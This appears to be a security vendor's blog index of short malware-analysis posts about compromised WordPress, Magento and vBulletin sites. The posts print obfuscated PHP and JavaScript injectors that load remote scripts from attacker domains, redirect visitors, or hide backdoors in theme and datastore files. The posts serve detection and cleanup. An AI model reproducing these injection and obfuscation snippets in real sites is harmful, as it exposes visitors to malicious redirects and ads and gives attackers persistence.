Category: Uncategorized

Do you remember SweetCAPTCHA that tried to monetize its WordPress plugin injecting unwanted ads into web pages?

Today we've found another CAPTCHA plugin with a suspicious code. We cleaned a site and our scanner reported a suspicious obfuscated code inside the Captcha on Login plugin (45,000+ all time installs) files.

captcha-on-login/index.php
captcha-on-login/templates/report.php
captcha-on-login/templates/options.php

The obfuscation had strings like this:

...
${ "GL\x4f\x42\x41LS" }[ "\x64\x78cq\x70c\x6ax\x77\x6f\x63\x72" ]
...

When we see such things, we always try to decode them to figure out whether it's legitimate or not.

...
public function options_page(){
$meu_link="http://vendacomtrafegogratuito [.]com .br";$meu_link2="hxxp://hotplus [.]net .br/plugin-hotlinks-plus/?clear";include("templates/options.php");
$meu_link="hxxp://vendacomtrafegogratuito [.]com .br";$meu_link2="http://hotplus [.]net .br/ plugin-hotlinks-plus/?clear";
}
...

Looks like that the owner of this plugin, called "Anderson Makiyama" is a Brazilian developer who is the owner of these affiliate marketing websites:
hxxp://hotplus .net .br/ plugin-hotlinks-plus/
hxxp://funildevendasparainiciante .com .br/ onde-divulgar-links-de-afiliados/

This plugin seems to be only showing these links inside the WordPress admin interface on the plugin options and report pages as "Other products of the author" (Outros Produtos do Autor). It's maybe a bit annoying but doesn't seem to be a big deal. It's natural for plugin developers to pitch their other products (even such questionable ones) on the internal plugin pages (not visible to site users).

The only problem is that link injecting code is obfuscated. Not only does it result in warnings produced by security scanners, but this practice is considered unacceptable by the official WordPress Plugin Directory guidelines:

4. No obfuscated code. We believe that obfuscated code violates the spirit, if not the letter, of the GPL license under which we operate....
...Intentionally obfuscated code is not the preferred form, and not allowed in the repository under any circumstances.

It's sad to see how plugins that are supposed to help stop hackers, actually do things that resemble what hackers do. Sometimes you can find such plugins even in the official WordPress plugin directory.

If you are looking for alternative solutions against brute force attacks, you can check our Website Firewall.

Recently I analyzed a porn doorway script and found an interesting way to obfuscate an IP address there.

$adr1 = ".............................................................................................................................................................................";
$adr2 = "............................................................................................................................................................................................................................................";
$adr3 = ".................................................................";
$adr4 = "........................";
$ard = strlen($adr1).".".strlen($adr2).".".strlen($adr3).".".strlen($adr4);

In the above code, you can see that each byte of the IP address $adr is represented by a string of dots, where the number of dots in the string is the byte value.

This give us the following IP address: 173 .236 .65 .24, which is used to generate a redirect URL for the doorway visitors:

header("Location: hxxp://$ard/input/?mark=20151119-$s");

In our case, the final redirect URL was hxxp://173 . 236 . 65 . 24/input/?mark=20151119-/azq9mzo3v

This code was found in thousands of .php doorway files created by the attackers. This is the sort of a hack that may cause troubles even after you have completely cleaned your site. You can read about such scenarios on our blog. To prevent Googlebot from indexing and re-indexing tons of pages that shouldn\'t have been there in the first place, it may be a good idea to close spammy directories on your server with robots.txt directives.

If you find something like this on your server, it\'s only a tip of an iceberg. To stop the hackers, you need also to find and close all security holes (including the backdoors that they uploaded to your site). If you need a professional help in malware cleanup and site protection, please check our Website AntiVirus service.

Once active during the past summer, the g00[.]co script injections come with a new wave on infections this November.

The most common variation is

<script src="hxxp: / / g00[.]co/BtFVPd"></script>

This short URL hides the hxxp://yourjavascript[.]com/3921156982/not.js script, which in turn opens hxxp://speedclick[.]info/app/amung.php?c=a&s= for visitors that come from Facebook, Google, Bing and Yahoo!

On the server side, the malware is mainly injected into WordPress theme files. Usually you can find the following PHP code (in one line. Line breaks added for readability) in either footer.php or functions.php:

if (strpos($_SERVER[base64_decode("UkVRVUVTVF9VUkk=")],
base64_decode("d3AtYWRtaW4=")) === false) 
{
echo base64_decode(base64_decode(base64_decode("VUVoT2Ft...skipped...edUFEwSw0K")));
}

It injects that g00 script into all site URLs that don't contain wp-admin.

As always, if you need site security monitoring and cleanup services, you can count on us.

Early this morning we got complaints from our clients mentioning that Norton was flagging Helpscout, a Help Desk System.

Some of the pages were triggering this warning

Upon a quick check at Norton Safe Web, we can clearly see that a few files (4) were flagged by them

We tried accessing those to see if there was indeed any malicious content in it but all of them led to a 404 - Not Found page. With that being said, all we can do at the moment is wait for Helpscout to ask Norton to review the Blacklisting status.

We worked on an infected Magento site that had unwanted pop-up ads when you visited it. The culprit was this injected script (spaces added intentionally)

<s c r i p t>document .write('>tpircs/<>"YzSBPWt9=i?php .war/moc . nibetsap / / :sptth"=crs tpircs<'.split("").reverse().join(""))</s c r i p t>

This code uses the reverse() JavaScript function to dynamically inject a remote script directly from Pastebin.com - https: / / pastebin . com/raw .php?i = 9tWPBSzY. That’s not the first time we see hackers leveraging the Pastebin service

This time the raw pastebin code uses the same reverse() trick to inject the final remote script from hxxp: / / lachinampa . com . mx/stat/. That script has the actual pop-up code that uses the blablatrafic .com as the intermediary between other ad providers.

In some cases, the same pop-up code injection was noticed on WordPress sites. So this isn’t limited to Magento and you should check your files and database even if you are using a different CMS. Or have us scan your site for you.

Lately we see waves of a strange WordPress infection.

It usually adds backdoor code at the top of theme files (footer.php, page.php, etc)

MyFileStore[.]com redirects from vBulletin sites have been a problem since 2011. It is associated with the VBSEO plugin with multiple unpatched vulnerabilities that has been discontinued for more than 3 year now. You can find more information about this hack here

Since then, the code remains pretty much the same. Only minor changes in variable names. Just search either the datastore table or the includes/datastore/datastore_cache.php file for = preg_replace( with strtr inside of it like:

...
$gpu = preg_replace($baseline, strtr($arrvb, $ajx, $ajx2), "vbseo");

Preceded by long gibberish stings that look like this:

...
$arrvb = '[R_=#AH_p[3"rP[abP[#Vj@?Vu=&_S?q!KZ`mu=8%$!zH8.:_T?&KuS"_K.:a}lLaxLN[}/g%>PL_K.nH$,7KuS}a8?}a}apW>L{Vj@bVugR!z?...

Despite the fact that that this hack is very old and VBSEO is no longer supported and should have been already removed from sites, we still regularly clean vBulletin websites affected by this infection.

Please, keep your sites software up-to-date. Secure it to prevent future break-ins.